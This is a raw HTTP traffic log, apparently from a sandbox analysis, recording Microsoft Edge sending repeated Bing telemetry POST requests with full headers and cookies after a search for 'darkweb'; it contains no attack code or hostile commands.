cookie: ak_bmsc=C2D6CC7390497BE1C01A7BFEDAA18236~000000000000000000000000000000~YAAQTTZ6XK2lT4iTAQAAn0QkkRprrpEhidRPBlBXEcq8yXcQA38uSNH+ETI0p/joh63w8poJaEkImLtdkLQg8/EeLnQEniFB9fWF6SoaVQIe5KSkFXprxWQ2pPBqq4I/D8YUJESQlK5QsHtLEcoDa3PnqsWEe4q04YjAJKxbTxs0IdENu3Ld3ZyU869Npt04Lj9uftmD82DOpCZZcnpaDM4NBczrWREbkwrmeCs/ZuQXeM4XhAbOZHWkHjyu4H+GFDVAyjbVFkVyMbaSsF/P9N6v2MiSZ4+HmkRq2NZ1SNJgeOjkaVuYIAwyvjJ7QYRpXBApJmvKrMqFG7BN/DQyPkYVcg40LPlKN3+Isi4ZjbcX1uRj2w4N+sXFrnRlWJZeLyIYFyoQVmRR
cookie: MUIDB=288EEA9122C96A183944FFDA23616B9B
cookie: SRCHUSR=DOB=20241204&T=1733306893000
cookie: _Rwho=u=d&ts=2024-12-04
cookie: ipv6=hit=1733310488290&t=4
cookie: BCP=AD=0&AL=0&SM=0
cookie: _EDGE_S=F=1&SID=1389AFCAD5F46BB6263EBA81D45C6A43&mkt=en-gb
cookie: _C_ETH=1
cookie: _RwBf=r=0&ilt=3&ihpd=0&ispd=3&rc=9&rb=0&gb=0&rg=200&pc=6&mtu=0&rbb=0&g=0&cid=&clo=0&v=3&l=2024-12-04T08:00:00.0000000Z&lft=0001-01-01T00:00:00.0000000&aof=0&ard=0001-01-01T00:00:00.0000000&rwdbt=0&rwflt=0&rwaul2=0&o=2&p=&c=&t=0&s=0001-01-01T00:00:00.0000000+00:00&ts=2024-12-04T10:09:00.7411999+00:00&rwred=0&wls=&wlb=&wle=&ccp=&cpt=&lka=0&lkt=0&aad=0&TH=
cookie: _SS=PC=U531&SID=1389AFCAD5F46BB6263EBA81D45C6A43&R=9&RB=0&GB=0&RG=200&RP=6
cookie: dsc=order=ShopOrderDefault
cookie: SRCHHPGUSR=SRCHLANG=en&DM=0&BRW=M&BRH=S&CW=1280&CH=601&SCW=1263&SCH=3469&DPR=1.0&UTC=0&PV=10.0&EXLTT=3&HV=1733306932&WTS=63868903693&PRVCW=1280&PRVCH=601
cookie: USRLOC=HS=1&ELOC=LAT=51.519901275634766|LON=-0.10880059748888016|N=London%2C%20Greater%20London|ELT=1|&BLOCK=TS=241204100901

Response

HTTP/2.0 200

content-length: 0
access-control-allow-origin: *
date: Wed, 04 Dec 2024 10:09:07 GMT
alt-svc: h3=":443"; ma=93600
x-cdn-traceid: 0.4d367a5c.1733306947.7f2066b
POST

https://www.bing.com/fd/ls/ls.gif?IG=202035EC43B64C3DBF7FE10F53408EC5&Type=Event.ClientInst&DATA={%22T%22:%22CI.Hover%22,%22AppNS%22:%22SERP%22,%22K%22:%225561.1%22,%22Name%22:%22VidCaption%22,%22TS%22:1733306936251,%22HType%22:%22h%22,%22FID%22:%22VideoAnswer%22,%22TType%22:0}&log=UserEvent

msedge.exe

Remote address:

95.101.143.203:443

Request

POST /fd/ls/ls.gif?IG=202035EC43B64C3DBF7FE10F53408EC5&Type=Event.ClientInst&DATA={%22T%22:%22CI.Hover%22,%22AppNS%22:%22SERP%22,%22K%22:%225561.1%22,%22Name%22:%22VidCaption%22,%22TS%22:1733306936251,%22HType%22:%22h%22,%22FID%22:%22VideoAnswer%22,%22TType%22:0}&log=UserEvent HTTP/2.0
host: www.bing.com
content-length: 0
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
sec-ch-ua-arch: "x86"
sec-ch-ua-full-version: "90.0.818.66"
sec-ch-ua-platform-version: "10.0"
content-type: text/plain;charset=UTF-8
ect: 4g
sec-ch-ua-model:
sec-ch-ua-platform: "Windows"
accept: */*
origin: https://www.bing.com
sec-fetch-site: same-origin
sec-fetch-mode: no-cors
sec-fetch-dest: empty
referer: https://www.bing.com/search?q=darkweb&qs=n&form=QBRE&sp=-1&ghc=1&lq=0&pq=darkweb&sc=10-7&sk=&cvid=6AB2CD56EF6C4338BF41C655438BDF1B&ghsh=0&ghacc=0&ghpl=
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: MUID=288EEA9122C96A183944FFDA23616B9B
cookie: _EDGE_V=1
cookie: SRCHD=AF=ANAB01
cookie: SRCHUID=V=2&GUID=86884DE4C7964E9A8BDF2F6863E1FF8B&dmnchg=1
cookie: ak_bmsc=C2D6CC7390497BE1C01A7BFEDAA18236~000000000000000000000000000000~YAAQTTZ6XK2lT4iTAQAAn0QkkRprrpEhidRPBlBXEcq8yXcQA38uSNH+ETI0p/joh63w8poJaEkImLtdkLQg8/EeLnQEniFB9fWF6SoaVQIe5KSkFXprxWQ2pPBqq4I/D8YUJESQlK5QsHtLEcoDa3PnqsWEe4q04YjAJKxbTxs0IdENu3Ld3ZyU869Npt04Lj9uftmD82DOpCZZcnpaDM4NBczrWREbkwrmeCs/ZuQXeM4XhAbOZHWkHjyu4H+GFDVAyjbVFkVyMbaSsF/P9N6v2MiSZ4+HmkRq2NZ1SNJgeOjkaVuYIAwyvjJ7QYRpXBApJmvKrMqFG7BN/DQyPkYVcg40LPlKN3+Isi4ZjbcX1uRj2w4N+sXFrnRlWJZeLyIYFyoQVmRR
cookie: MUIDB=288EEA9122C96A183944FFDA23616B9B
cookie: SRCHUSR=DOB=20241204&T=1733306893000
cookie: _Rwho=u=d&ts=2024-12-04
cookie: ipv6=hit=1733310488290&t=4
cookie: BCP=AD=0&AL=0&SM=0
cookie: _EDGE_S=F=1&SID=1389AFCAD5F46BB6263EBA81D45C6A43&mkt=en-gb
cookie: _C_ETH=1
cookie: _RwBf=r=0&ilt=3&ihpd=0&ispd=3&rc=9&rb=0&gb=0&rg=200&pc=6&mtu=0&rbb=0&g=0&cid=&clo=0&v=3&l=2024-12-04T08:00:00.0000000Z&lft=0001-01-01T00:00:00.0000000&aof=0&ard=0001-01-01T00:00:00.0000000&rwdbt=0&rwflt=0&rwaul2=0&o=2&p=&c=&t=0&s=0001-01-01T00:00:00.0000000+00:00&ts=2024-12-04T10:09:00.7411999+00:00&rwred=0&wls=&wlb=&wle=&ccp=&cpt=&lka=0&lkt=0&aad=0&TH=
cookie: _SS=PC=U531&SID=1389AFCAD5F46BB6263EBA81D45C6A43&R=9&RB=0&GB=0&RG=200&RP=6
cookie: dsc=order=ShopOrderDefault
cookie: SRCHHPGUSR=SRCHLANG=en&DM=0&BRW=M&BRH=S&CW=1280&CH=601&SCW=1263&SCH=3469&DPR=1.0&UTC=0&PV=10.0&EXLTT=3&HV=1733306932&WTS=63868903693&PRVCW=1280&PRVCH=601
cookie: USRLOC=HS=1&ELOC=LAT=51.519901275634766|LON=-0.10880059748888016|N=London%2C%20Greater%20London|ELT=1|&BLOCK=TS=241204100901

Response

HTTP/2.0 200

content-length: 0
access-control-allow-origin: *
date: Wed, 04 Dec 2024 10:09:07 GMT
alt-svc: h3=":443"; ma=93600
x-cdn-traceid: 0.4d367a5c.1733306947.7f20758
POST

https://www.bing.com/fd/ls/lsp.aspx

msedge.exe

Remote address:

95.101.143.203:443

Request

POST /fd/ls/lsp.aspx HTTP/2.0
host: www.bing.com
content-length: 1971
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
sec-ch-ua-arch: "x86"
sec-ch-ua-full-version: "90.0.818.66"
sec-ch-ua-platform-version: "10.0"
content-type: text/xml
ect: 4g
sec-ch-ua-model:
sec-ch-ua-platform: "Windows"
accept: */*
origin: https://www.bing.com
sec-fetch-site: same-origin
sec-fetch-mode: cors
sec-fetch-dest: empty
referer: https://www.bing.com/search?q=darkweb&qs=n&form=QBRE&sp=-1&ghc=1&lq=0&pq=darkweb&sc=10-7&sk=&cvid=6AB2CD56EF6C4338BF41C655438BDF1B&ghsh=0&ghacc=0&ghpl=
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: MUID=288EEA9122C96A183944FFDA23616B9B
cookie: _EDGE_V=1
cookie: SRCHD=AF=ANAB01
cookie: SRCHUID=V=2&GUID=86884DE4C7964E9A8BDF2F6863E1FF8B&dmnchg=1
cookie: ak_bmsc=C2D6CC7390497BE1C01A7BFEDAA18236~000000000000000000000000000000~YAAQTTZ6XK2lT4iTAQAAn0QkkRprrpEhidRPBlBXEcq8yXcQA38uSNH+ETI0p/joh63w8poJaEkImLtdkLQg8/EeLnQEniFB9fWF6SoaVQIe5KSkFXprxWQ2pPBqq4I/D8YUJESQlK5QsHtLEcoDa3PnqsWEe4q04YjAJKxbTxs0IdENu3Ld3ZyU869Npt04Lj9uftmD82DOpCZZcnpaDM4NBczrWREbkwrmeCs/ZuQXeM4XhAbOZHWkHjyu4H+GFDVAyjbVFkVyMbaSsF/P9N6v2MiSZ4+HmkRq2NZ1SNJgeOjkaVuYIAwyvjJ7QYRpXBApJmvKrMqFG7BN/DQyPkYVcg40LPlKN3+Isi4ZjbcX1uRj2w4N+sXFrnRlWJZeLyIYFyoQVmRR
cookie: MUIDB=288EEA9122C96A183944FFDA23616B9B
cookie: SRCHUSR=DOB=20241204&T=1733306893000
cookie: _Rwho=u=d&ts=2024-12-04
cookie: ipv6=hit=1733310488290&t=4
cookie: BCP=AD=0&AL=0&SM=0
cookie: _EDGE_S=F=1&SID=1389AFCAD5F46BB6263EBA81D45C6A43&mkt=en-gb
cookie: _C_ETH=1
cookie: _RwBf=r=0&ilt=3&ihpd=0&ispd=3&rc=9&rb=0&gb=0&rg=200&pc=6&mtu=0&rbb=0&g=0&cid=&clo=0&v=3&l=2024-12-04T08:00:00.0000000Z&lft=0001-01-01T00:00:00.0000000&aof=0&ard=0001-01-01T00:00:00.0000000&rwdbt=0&rwflt=0&rwaul2=0&o=2&p=&c=&t=0&s=0001-01-01T00:00:00.0000000+00:00&ts=2024-12-04T10:09:00.7411999+00:00&rwred=0&wls=&wlb=&wle=&ccp=&cpt=&lka=0&lkt=0&aad=0&TH=
cookie: _SS=PC=U531&SID=1389AFCAD5F46BB6263EBA81D45C6A43&R=9&RB=0&GB=0&RG=200&RP=6
cookie: dsc=order=ShopOrderDefault
cookie: SRCHHPGUSR=SRCHLANG=en&DM=0&BRW=M&BRH=S&CW=1280&CH=601&SCW=1263&SCH=3469&DPR=1.0&UTC=0&PV=10.0&EXLTT=3&HV=1733306932&WTS=63868903693&PRVCW=1280&PRVCH=601
cookie: USRLOC=HS=1&ELOC=LAT=51.519901275634766|LON=-0.10880059748888016|N=London%2C%20Greater%20London|ELT=1|&BLOCK=TS=241204100901

Response

HTTP/2.0 200

content-length: 0
access-control-allow-origin: *
date: Wed, 04 Dec 2024 10:09:08 GMT
alt-svc: h3=":443"; ma=93600
x-cdn-traceid: 0.4d367a5c.1733306948.7f20ab2
POST

https://www.bing.com/fd/ls/ls.gif?IG=202035EC43B64C3DBF7FE10F53408EC5&Type=Event.ClientInst&DATA={%22T%22:%22CI.Hover%22,%22AppNS%22:%22SERP%22,%22K%22:%225561.1%22,%22Name%22:%22VidCaption%22,%22TS%22:1733306938253,%22HType%22:%22d2%22,%22FID%22:%22VideoAnswer%22,%22TType%22:0}&log=UserEvent

msedge.exe

Remote address:

95.101.143.203:443

Request

POST /fd/ls/ls.gif?IG=202035EC43B64C3DBF7FE10F53408EC5&Type=Event.ClientInst&DATA={%22T%22:%22CI.Hover%22,%22AppNS%22:%22SERP%22,%22K%22:%225561.1%22,%22Name%22:%22VidCaption%22,%22TS%22:1733306938253,%22HType%22:%22d2%22,%22FID%22:%22VideoAnswer%22,%22TType%22:0}&log=UserEvent HTTP/2.0
host: www.bing.com
content-length: 0
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
sec-ch-ua-arch: "x86"
sec-ch-ua-full-version: "90.0.818.66"
sec-ch-ua-platform-version: "10.0"
content-type: text/plain;charset=UTF-8
ect: 4g
sec-ch-ua-model:
sec-ch-ua-platform: "Windows"
accept: */*
origin: https://www.bing.com
sec-fetch-site: same-origin
sec-fetch-mode: no-cors
sec-fetch-dest: empty
referer: https://www.bing.com/search?q=darkweb&qs=n&form=QBRE&sp=-1&ghc=1&lq=0&pq=darkweb&sc=10-7&sk=&cvid=6AB2CD56EF6C4338BF41C655438BDF1B&ghsh=0&ghacc=0&ghpl=
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: MUID=288EEA9122C96A183944FFDA23616B9B
cookie: _EDGE_V=1
cookie: SRCHD=AF=ANAB01
cookie: SRCHUID=V=2&GUID=86884DE4C7964E9A8BDF2F6863E1FF8B&dmnchg=1
cookie: ak_bmsc=C2D6CC7390497BE1C01A7BFEDAA18236~000000000000000000000000000000~YAAQTTZ6XK2lT4iTAQAAn0QkkRprrpEhidRPBlBXEcq8yXcQA38uSNH+ETI0p/joh63w8poJaEkImLtdkLQg8/EeLnQEniFB9fWF6SoaVQIe5KSkFXprxWQ2pPBqq4I/D8YUJESQlK5QsHtLEcoDa3PnqsWEe4q04YjAJKxbTxs0IdENu3Ld3ZyU869Npt04Lj9uftmD82DOpCZZcnpaDM4NBczrWREbkwrmeCs/ZuQXeM4XhAbOZHWkHjyu4H+GFDVAyjbVFkVyMbaSsF/P9N6v2MiSZ4+HmkRq2NZ1SNJgeOjkaVuYIAwyvjJ7QYRpXBApJmvKrMqFG7BN/DQyPkYVcg40LPlKN3+Isi4ZjbcX1uRj2w4N+sXFrnRlWJZeLyIYFyoQVmRR
cookie: MUIDB=288EEA9122C96A183944FFDA23616B9B
cookie: SRCHUSR=DOB=20241204&T=1733306893000
cookie: _Rwho=u=d&ts=2024-12-04
cookie: ipv6=hit=1733310488290&t=4
cookie: BCP=AD=0&AL=0&SM=0
cookie: _EDGE_S=F=1&SID=1389AFCAD5F46BB6263EBA81D45C6A43&mkt=en-gb
cookie: _C_ETH=1
cookie: _RwBf=r=0&ilt=3&ihpd=0&ispd=3&rc=9&rb=0&gb=0&rg=200&pc=6&mtu=0&rbb=0&g=0&cid=&clo=0&v=3&l=2024-12-04T08:00:00.0000000Z&lft=0001-01-01T00:00:00.0000000&aof=0&ard=0001-01-01T00:00:00.0000000&rwdbt=0&rwflt=0&rwaul2=0&o=2&p=&c=&t=0&s=0001-01-01T00:00:00.0000000+00:00&ts=2024-12-04T10:09:00.7411999+00:00&rwred=0&wls=&wlb=&wle=&ccp=&cpt=&lka=0&lkt=0&aad=0&TH=
cookie: _SS=PC=U531&SID=1389AFCAD5F46BB6263EBA81D45C6A43&R=9&RB=0&GB=0&RG=200&RP=6
cookie: dsc=order=ShopOrderDefault
cookie: SRCHHPGUSR=SRCHLANG=en&DM=0&BRW=M&BRH=S&CW=1280&CH=601&SCW=1263&SCH=3469&DPR=1.0&UTC=0&PV=10.0&EXLTT=3&HV=1733306932&WTS=63868903693&PRVCW=1280&PRVCH=601
cookie: USRLOC=HS=1&ELOC=LAT=51.519901275634766|LON=-0.10880059748888016|N=London%2C%20Greater%20London|ELT=1|&BLOCK=TS=241204100901

Response

HTTP/2.0 204

access-control-allow-origin: *
date: Wed, 04 Dec 2024 10:09:09 GMT
alt-svc: h3=":443"; ma=93600
x-cdn-traceid: 0.4d367a5c.1733306949.7f20f8c
POST

https://www.bing.com/fd/ls/ls.gif?IG=202035EC43B64C3DBF7FE10F53408EC5&Type=Event.ClientInst&DATA={%22T%22:%22CI.RichHover.Summary%22,%22AppNS%22:%22SERP%22,%22K%22:%225561.1%22,%22TS%22:1733306938331,%22DU%22:2281,%22THLT%22:240,%22RCLT%22:null,%22MOS%22:5483,%22MOT%22:2281,%22IsMT%22:1,%22VPST%22:352,%22VDT%22:353,%22MaxVPT%22:2281,%22SCNT%22:0,%22MMSTLT%22:null,%22IsMMT%22:0,%22MuteCNT%22:0,%22Mute%22:1,%22IFLT%22:null,%22IFSCT%22:null}&log=UserEvent

msedge.exe

Remote address:

95.101.143.203:443

Request

POST /fd/ls/ls.gif?IG=202035EC43B64C3DBF7FE10F53408EC5&Type=Event.ClientInst&DATA={%22T%22:%22CI.RichHover.Summary%22,%22AppNS%22:%22SERP%22,%22K%22:%225561.1%22,%22TS%22:1733306938331,%22DU%22:2281,%22THLT%22:240,%22RCLT%22:null,%22MOS%22:5483,%22MOT%22:2281,%22IsMT%22:1,%22VPST%22:352,%22VDT%22:353,%22MaxVPT%22:2281,%22SCNT%22:0,%22MMSTLT%22:null,%22IsMMT%22:0,%22MuteCNT%22:0,%22Mute%22:1,%22IFLT%22:null,%22IFSCT%22:null}&log=UserEvent HTTP/2.0
host: www.bing.com
content-length: 0
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
sec-ch-ua-arch: "x86"
sec-ch-ua-full-version: "90.0.818.66"
sec-ch-ua-platform-version: "10.0"
content-type: text/plain;charset=UTF-8
ect: 4g
sec-ch-ua-model:
sec-ch-ua-platform: "Windows"
accept: */*
origin: https://www.bing.com
sec-fetch-site: same-origin
sec-fetch-mode: no-cors
sec-fetch-dest: empty
referer: https://www.bing.com/search?q=darkweb&qs=n&form=QBRE&sp=-1&ghc=1&lq=0&pq=darkweb&sc=10-7&sk=&cvid=6AB2CD56EF6C4338BF41C655438BDF1B&ghsh=0&ghacc=0&ghpl=
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: MUID=288EEA9122C96A183944FFDA23616B9B
cookie: _EDGE_V=1
cookie: SRCHD=AF=ANAB01
cookie: SRCHUID=V=2&GUID=86884DE4C7964E9A8BDF2F6863E1FF8B&dmnchg=1
cookie: ak_bmsc=C2D6CC7390497BE1C01A7BFEDAA18236~000000000000000000000000000000~YAAQTTZ6XK2lT4iTAQAAn0QkkRprrpEhidRPBlBXEcq8yXcQA38uSNH+ETI0p/joh63w8poJaEkImLtdkLQg8/EeLnQEniFB9fWF6SoaVQIe5KSkFXprxWQ2pPBqq4I/D8YUJESQlK5QsHtLEcoDa3PnqsWEe4q04YjAJKxbTxs0IdENu3Ld3ZyU869Npt04Lj9uftmD82DOpCZZcnpaDM4NBczrWREbkwrmeCs/ZuQXeM4XhAbOZHWkHjyu4H+GFDVAyjbVFkVyMbaSsF/P9N6v2MiSZ4+HmkRq2NZ1SNJgeOjkaVuYIAwyvjJ7QYRpXBApJmvKrMqFG7BN/DQyPkYVcg40LPlKN3+Isi4ZjbcX1uRj2w4N+sXFrnRlWJZeLyIYFyoQVmRR
cookie: MUIDB=288EEA9122C96A183944FFDA23616B9B
cookie: SRCHUSR=DOB=20241204&T=1733306893000
cookie: _Rwho=u=d&ts=2024-12-04
cookie: ipv6=hit=1733310488290&t=4
cookie: BCP=AD=0&AL=0&SM=0
cookie: _EDGE_S=F=1&SID=1389AFCAD5F46BB6263EBA81D45C6A43&mkt=en-gb
cookie: _C_ETH=1
cookie: _RwBf=r=0&ilt=3&ihpd=0&ispd=3&rc=9&rb=0&gb=0&rg=200&pc=6&mtu=0&rbb=0&g=0&cid=&clo=0&v=3&l=2024-12-04T08:00:00.0000000Z&lft=0001-01-01T00:00:00.0000000&aof=0&ard=0001-01-01T00:00:00.0000000&rwdbt=0&rwflt=0&rwaul2=0&o=2&p=&c=&t=0&s=0001-01-01T00:00:00.0000000+00:00&ts=2024-12-04T10:09:00.7411999+00:00&rwred=0&wls=&wlb=&wle=&ccp=&cpt=&lka=0&lkt=0&aad=0&TH=
cookie: _SS=PC=U531&SID=1389AFCAD5F46BB6263EBA81D45C6A43&R=9&RB=0&GB=0&RG=200&RP=6
cookie: dsc=order=ShopOrderDefault
cookie: SRCHHPGUSR=SRCHLANG=en&DM=0&BRW=M&BRH=S&CW=1280&CH=601&SCW=1263&SCH=3469&DPR=1.0&UTC=0&PV=10.0&EXLTT=3&HV=1733306932&WTS=63868903693&PRVCW=1280&PRVCH=601
cookie: USRLOC=HS=1&ELOC=LAT=51.519901275634766|LON=-0.10880059748888016|N=London%2C%20Greater%20London|ELT=1|&BLOCK=TS=241204100901

Response

HTTP/2.0 204

access-control-allow-origin: *
date: Wed, 04 Dec 2024 10:09:10 GMT
alt-svc: h3=":443"; ma=93600
x-cdn-traceid: 0.4d367a5c.1733306950.7f217ff
POST

https://www.bing.com/fd/ls/ls.gif?IG=202035EC43B64C3DBF7FE10F53408EC5&Type=Event.ClientInst&DATA={%22T%22:%22CI.Hover%22,%22AppNS%22:%22SERP%22,%22K%22:%225562.1%22,%22Name%22:%22VidCaption%22,%22TS%22:1733306938548,%22HType%22:%22h%22,%22FID%22:%22VideoAnswer%22,%22TType%22:0}&log=UserEvent

msedge.exe

Remote address:

95.101.143.203:443

Request

POST /fd/ls/ls.gif?IG=202035EC43B64C3DBF7FE10F53408EC5&Type=Event.ClientInst&DATA={%22T%22:%22CI.Hover%22,%22AppNS%22:%22SERP%22,%22K%22:%225562.1%22,%22Name%22:%22VidCaption%22,%22TS%22:1733306938548,%22HType%22:%22h%22,%22FID%22:%22VideoAnswer%22,%22TType%22:0}&log=UserEvent HTTP/2.0
host: www.bing.com
content-length: 0
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
sec-ch-ua-arch: "x86"
sec-ch-ua-full-version: "90.0.818.66"
sec-ch-ua-platform-version: "10.0"
content-type: text/plain;charset=UTF-8
ect: 4g
sec-ch-ua-model:
sec-ch-ua-platform: "Windows"
accept: */*
origin: https://www.bing.com
sec-fetch-site: same-origin
sec-fetch-mode: no-cors
sec-fetch-dest: empty
referer: https://www.bing.com/search?q=darkweb&qs=n&form=QBRE&sp=-1&ghc=1&lq=0&pq=darkweb&sc=10-7&sk=&cvid=6AB2CD56EF6C4338BF41C655438BDF1B&ghsh=0&ghacc=0&ghpl=
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: MUID=288EEA9122C96A183944FFDA23616B9B
cookie: _EDGE_V=1
cookie: SRCHD=AF=ANAB01
cookie: SRCHUID=V=2&GUID=86884DE4C7964E9A8BDF2F6863E1FF8B&dmnchg=1
cookie: ak_bmsc=C2D6CC7390497BE1C01A7BFEDAA18236~000000000000000000000000000000~YAAQTTZ6XK2lT4iTAQAAn0QkkRprrpEhidRPBlBXEcq8yXcQA38uSNH+ETI0p/joh63w8poJaEkImLtdkLQg8/EeLnQEniFB9fWF6SoaVQIe5KSkFXprxWQ2pPBqq4I/D8YUJESQlK5QsHtLEcoDa3PnqsWEe4q04YjAJKxbTxs0IdENu3Ld3ZyU869Npt04Lj9uftmD82DOpCZZcnpaDM4NBczrWREbkwrmeCs/ZuQXeM4XhAbOZHWkHjyu4H+GFDVAyjbVFkVyMbaSsF/P9N6v2MiSZ4+HmkRq2NZ1SNJgeOjkaVuYIAwyvjJ7QYRpXBApJmvKrMqFG7BN/DQyPkYVcg40LPlKN3+Isi4ZjbcX1uRj2w4N+sXFrnRlWJZeLyIYFyoQVmRR
cookie: MUIDB=288EEA9122C96A183944FFDA23616B9B
cookie: SRCHUSR=DOB=20241204&T=1733306893000
cookie: _Rwho=u=d&ts=2024-12-04
cookie: ipv6=hit=1733310488290&t=4
cookie: BCP=AD=0&AL=0&SM=0
cookie: _EDGE_S=F=1&SID=1389AFCAD5F46BB6263EBA81D45C6A43&mkt=en-gb
cookie: _C_ETH=1
cookie: _RwBf=r=0&ilt=3&ihpd=0&ispd=3&rc=9&rb=0&gb=0&rg=200&pc=6&mtu=0&rbb=0&g=0&cid=&clo=0&v=3&l=2024-12-04T08:00:00.0000000Z&lft=0001-01-01T00:00:00.0000000&aof=0&ard=0001-01-01T00:00:00.0000000&rwdbt=0&rwflt=0&rwaul2=0&o=2&p=&c=&t=0&s=0001-01-01T00:00:00.0000000+00:00&ts=2024-12-04T10:09:00.7411999+00:00&rwred=0&wls=&wlb=&wle=&ccp=&cpt=&lka=0&lkt=0&aad=0&TH=
cookie: _SS=PC=U531&SID=1389AFCAD5F46BB6263EBA81D45C6A43&R=9&RB=0&GB=0&RG=200&RP=6
cookie: dsc=order=ShopOrderDefault
cookie: SRCHHPGUSR=SRCHLANG=en&DM=0&BRW=M&BRH=S&CW=1280&CH=601&SCW=1263&SCH=3469&DPR=1.0&UTC=0&PV=10.0&EXLTT=3&HV=1733306932&WTS=63868903693&PRVCW=1280&PRVCH=601
cookie: USRLOC=HS=1&ELOC=LAT=51.519901275634766|LON=-0.10880059748888016|N=London%2C%20Greater%20London|ELT=1|&BLOCK=TS=241204100901

Response

HTTP/2.0 200

content-length: 390
content-type: application/json; charset=utf-8
cache-control: private, max-age=300
content-encoding: br
vary: Accept-Encoding
x-eventid: 67502a4859a94d12a38d80f01d1b7070
x-as-setsessionmarket: en-gb
accept-ch: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Full-Version, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, ECT, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UA
useragentreductionoptout: A7kgTC5xdZ2WIVGZEfb1hUoNuvjzOZX3VIV/BA6C18kQOOF50Q0D3oWoAm49k3BQImkujKILc7JmPysWk3CSjwUAAACMeyJvcmlnaW4iOiJodHRwczovL3d3dy5iaW5nLmNvbTo0NDMiLCJmZWF0dXJlIjoiU2VuZEZ1bGxVc2VyQWdlbnRBZnRlclJlZHVjdGlvbiIsImV4cGlyeSI6MTY4NDg4NjM5OSwiaXNTdWJkb21haW4iOnRydWUsImlzVGhpcmRQYXJ0eSI6dHJ1ZX0=
content-security-policy: script-src https: 'strict-dynamic' 'report-sample' 'wasm-unsafe-eval' 'nonce-zolnOBO6jkcabln1mqV4rTMAKh8A1dUTblB1TfeOwvE='; base-uri 'self';report-to csp-endpoint
report-to: {"group":"csp-endpoint","max_age":86400,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingcsp"}]}
p3p: CP="NON UNI COM NAV STA LOC CURa DEVa PSAa PSDa OUR IND"
date: Wed, 04 Dec 2024 10:09:12 GMT
set-cookie: _EDGE_S=F=1&SID=1389AFCAD5F46BB6263EBA81D45C6A43&mkt=en-gb; domain=.bing.com; path=/; HttpOnly
alt-svc: h3=":443"; ma=93600
x-cdn-traceid: 0.4d367a5c.1733306952.7f21ddf
POST

https://www.bing.com/fd/ls/ls.gif?IG=202035EC43B64C3DBF7FE10F53408EC5&Type=Event.ClientInst&DATA={%22T%22:%22CI.RichHover.Summary%22,%22AppNS%22:%22SERP%22,%22K%22:%225562.1%22,%22TS%22:1733306939154,%22DU%22:820,%22THLT%22:254,%22RCLT%22:null,%22MOS%22:7767,%22MOT%22:820,%22IsMT%22:1,%22VPST%22:325,%22VDT%22:325,%22MaxVPT%22:820,%22SCNT%22:0,%22MMSTLT%22:null,%22IsMMT%22:0,%22MuteCNT%22:0,%22Mute%22:1,%22IFLT%22:null,%22IFSCT%22:null}&log=UserEvent

msedge.exe

Remote address:

95.101.143.203:443

Request

POST /fd/ls/ls.gif?IG=202035EC43B64C3DBF7FE10F53408EC5&Type=Event.ClientInst&DATA={%22T%22:%22CI.RichHover.Summary%22,%22AppNS%22:%22SERP%22,%22K%22:%225562.1%22,%22TS%22:1733306939154,%22DU%22:820,%22THLT%22:254,%22RCLT%22:null,%22MOS%22:7767,%22MOT%22:820,%22IsMT%22:1,%22VPST%22:325,%22VDT%22:325,%22MaxVPT%22:820,%22SCNT%22:0,%22MMSTLT%22:null,%22IsMMT%22:0,%22MuteCNT%22:0,%22Mute%22:1,%22IFLT%22:null,%22IFSCT%22:null}&log=UserEvent HTTP/2.0
host: www.bing.com
content-length: 0
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
sec-ch-ua-arch: "x86"
sec-ch-ua-full-version: "90.0.818.66"
sec-ch-ua-platform-version: "10.0"
content-type: text/plain;charset=UTF-8
ect: 4g
sec-ch-ua-model:
sec-ch-ua-platform: "Windows"
accept: */*
origin: https://www.bing.com
sec-fetch-site: same-origin
sec-fetch-mode: no-cors
sec-fetch-dest: empty
referer: https://www.bing.com/search?q=darkweb&qs=n&form=QBRE&sp=-1&ghc=1&lq=0&pq=darkweb&sc=10-7&sk=&cvid=6AB2CD56EF6C4338BF41C655438BDF1B&ghsh=0&ghacc=0&ghpl=
accept-encoding: gzip, deflate, br
